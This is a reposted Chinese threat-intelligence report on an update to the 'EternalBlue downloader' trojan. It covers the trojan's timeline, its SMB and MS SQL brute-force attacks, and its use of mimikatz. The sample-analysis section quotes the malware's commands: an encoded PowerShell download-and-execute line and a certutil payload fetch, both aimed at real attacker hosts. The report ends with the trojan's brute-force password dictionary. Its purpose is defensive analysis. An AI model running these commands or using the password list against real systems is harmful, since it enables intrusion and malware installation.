https://weibo.com/ttarticle/p/show?id=2309404344350225132710
永恒之蓝下载器木马又双叒叕升级了新的攻击方式??
背景
腾讯安全御见威胁情报中心于 2019 年 2 月 25 日发现曾利用驱动人生公司升级渠道发起供应链攻击的永恒之蓝下载器木马再次更新. 此次更新仍然在攻击模块, 在此前新增 MS SQL 爆破攻击的基础上, 更新爆破密码字典, 然后将使用 mimiktaz 搜集登录密码并添加到字典, 并利用该字典进行 SMB 爆破攻击, MS SQL 爆破攻击. 同添加了永恒之蓝漏洞攻击后木马启动代码, 攻击进程执行状态检查代码, 并尝试对木马文件添加签名认证.
这个 "永恒之蓝" 木马下载器黑产团伙自供应链攻击得手之后, 一直很活跃, 期间不断更新调整木马攻击方式, 蠕虫式传播的特点不断增强.
以下是该团伙主要活动情况的时间线:
2018 年 12 月 14 日
利用 "驱动人生" 系列软件升级通道下发, 利用 "永恒之蓝" 漏洞攻击传播.
2018 年 12 月 19 日
下发之后的木马新增 PowerShell 后门安装.
2019 年 1 月 09 日
检测到挖矿组件 xmrig-32.mlz/xmrig-64.mlz 下载.
2019 年 1 月 24 日
木马将挖矿组件, 升级后门组件分别安装为计划任务, 并同时安装 PowerShell 后门.
2019 年 1 月 25 日 木马在 1 月 24 日的基础上再次更新, 将攻击组件安装为计划任务, 在攻击时新增利用 mimikatz 搜集登录密码, SMB 弱口令爆破攻击, 同时安装 PowerShell 计划任务和 hta 计划任务.
2019 年 2 月 10 日
将攻击模块打包方式改为 Pyinstaller.
2019 年 2 月 20 日
更新矿机组件, 下载释放 XMRig 矿机, 以独立进程启动挖矿.
2019 年 2 月 23 日
攻击方法再次更新, 新增 MS SQL 爆破攻击.
2019 年 2 月 25 日
在 2 月 23 日基础上继续更新, 更新 MS SQL 爆破攻击时密码字典, 添加样本文件签名. 至此攻击方法集成永恒之蓝漏洞攻击, SMB 爆破攻击, MsSQL 爆破攻击, 同时使用黑客工具 mimiktaz,psexec 进行辅助攻击.
一, 样本信息
Md5:0a4dcd170708f785f314c16797baaddb
文件路径: C:\Windows\Temp\svchost.exe
计划任务: DnsScan
文件数字签名:"Shenzhen Smartspace Software technology Co.,Limited"
二, 样本分析
主程序代码长度对比: 2 月 23 日更新后为 1886 行, 2 月 25 日更新后为 1909 行.
(新增代码 1) 爆破时使用密码字典新增密码:
- '4yqbm4,m`~!@~#$%^&*(),.;'
- 'A123456'
使用 mimiktaz 搜集登录密码并添加到该密码字典中
利用该密码字典进行 SMB 爆破攻击
利用该密码字典进行 MsSQL 爆破攻击, 攻击成功后添加账户: k8h3d, 修改 MsSQL 超级管理员密码为: "ksa8hd4,m@~#$%^&*()", 并将通过 MS SQL 程序及 1433 端口进入计算机的防火墙规则设置为允许通过
MsSQL 爆破成功后安装 Bluetooths 计划任务执行 powershelll 后门:
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="(解密字符: powershell -ep bypass -e IEX (New-Object.NET.webClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN))
同时通过 Certutil 命令下载母体木马植入:
certutil -urlcache -split -f hxxp://dl.haqo.NET/dll.exe?fr=MS SQL c:\\setupinstalled.exe&&c:\\setupinstalled.exe
(新增代码 2) 在永恒之蓝漏洞攻击之成功并且植入木马后, 添加通过服务方式启动植入木马 installed.exe 的代码
(新增代码 3) 添加并执行函数 eb(), 检查攻击模块执行状态
?
安全建议
1. 服务器暂时关闭不必要的端口 (如 135,139,445), 方法可参考: https://guanjia.qq.com/web_clinic/s8/585.html
2. 服务器使用高强度密码, 切勿使用弱口令, 防止黑客暴力破解;
3. 使用杀毒软件拦截可能的病毒攻击;
4. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击. 御界高级威胁检测系统, 是基于腾讯安全反病毒实验室的安全能力, 依托腾讯在云和端的海量数据, 研发出的独特威胁情报和恶意检测模型系统.
- IOCs
- Md5
- 0a4dcd170708f785f314c16797baaddb
弱密码字典
- 123456,
- password,
- qwerty,
- 12345678,
- 123456789,
- 123,
- 1234,
- 123123,
- 12345,
- 12345678,
- 123123123,
- 1234567890,
- 88888888,
- 111111111,
- 000000,
- 111111,
- 112233,
- 123321,
- 654321,
- 666666,
- 888888,
- a123456,
- 123456a,
- 5201314,
- 1qaz2wsx,
- 1q2w3e4r,
- qwe123,
- 123qwe,
- a123456789,
- 123456789a,
- baseball,
- dragon,
- football,
- iloveyou,
- password,
- sunshine,
- princess,
- welcome,
- abc123,
- monkey,
- !@#$%^&*,
- charlie,
- aa123456,
- Aa123456,
- admin,
- homelesspa,
- password1,
- 1q2w3e4r5t,
- qwertyuiop,
- 1qaz2wsx,
- sa,
- sasa,
- sa123,
- sql2005,
- 1,
- admin@123,
- sa2008,
- 1111,
- passw0rd,
- abc,
- abc123,
- abcdefg,
- sapassword,
- Aa12345678,
- ABCabc123,
- sqlpassword,
- 1qaz2wsx,
- 1qaz!QAZ,
- sql2008,
- ksa8hd4,m@~#$%^&*(),
- 4yqbm4,m`~!@~#$%^&*(),.; ,
- 4yqbm4,m`~!@~#$%^&*(),.;,
- A123456????
来源: http://www.bubuko.com/infodetail-2970478.html